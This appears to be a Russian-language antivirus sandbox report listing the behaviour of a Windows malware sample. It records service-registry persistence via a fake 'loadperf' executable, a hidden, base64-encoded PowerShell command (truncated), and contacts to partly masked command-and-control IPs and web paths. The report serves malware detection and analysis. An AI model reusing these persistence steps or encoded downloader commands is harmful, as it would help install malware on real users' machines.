Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\EFS] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\loadperf] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\loadperf] 'ImagePath' = '"%WINDIR%\SysWOW64\odtext32\loadperf.exe"'
- 'loadperf' "%WINDIR%\SysWOW64\odtext32\loadperf.exe"
- 'loadperf' %WINDIR%\SysWOW64\odtext32\loadperf.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAgADgANABaAEcAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAtAEYAIAAnAFMAeQBzACcALAAnAEQAJwAsACcAaQAnACwAJwBSACcALAAnAFQARQ...
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe в %WINDIR%\syswow64\odtext32\loadperf.exe
- %HOMEPATH%\f9akmt8\u3j4c7c\mn8d4_glo.exe
- '19#.#02.229.74':80
- '11#.#9.11.81':7080
- '70.##.251.94':8080
- http://at###style.com/wp-admin/pB/
- http://70.##.251.94:8080/BXtB9nYMH11SUjEsbk/0p75t7v/E0B54dHTgcyj33Ex/mgs7WG5nx7vUHt/ZsEGsxbkbb7HLd/ via 70.##.251.94
- DNS ASK at###style.com
- DNS ASK ni###angseo.com
- DNS ASK mr##ggy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAdAAgADgANABaAEcAIAAgACgAIABbAFQAWQBQAEUAXQAoACIAewAwAH0AewA0AH0AewAxAH0AewAyAH0AewAzAH0AewA1AH0AIgAtAEYAIAAnAFMAeQBzACcALAAnAEQAJwAsACcAaQAnACwAJwBSACcALAAnAFQARQ...' (со скрытым окном)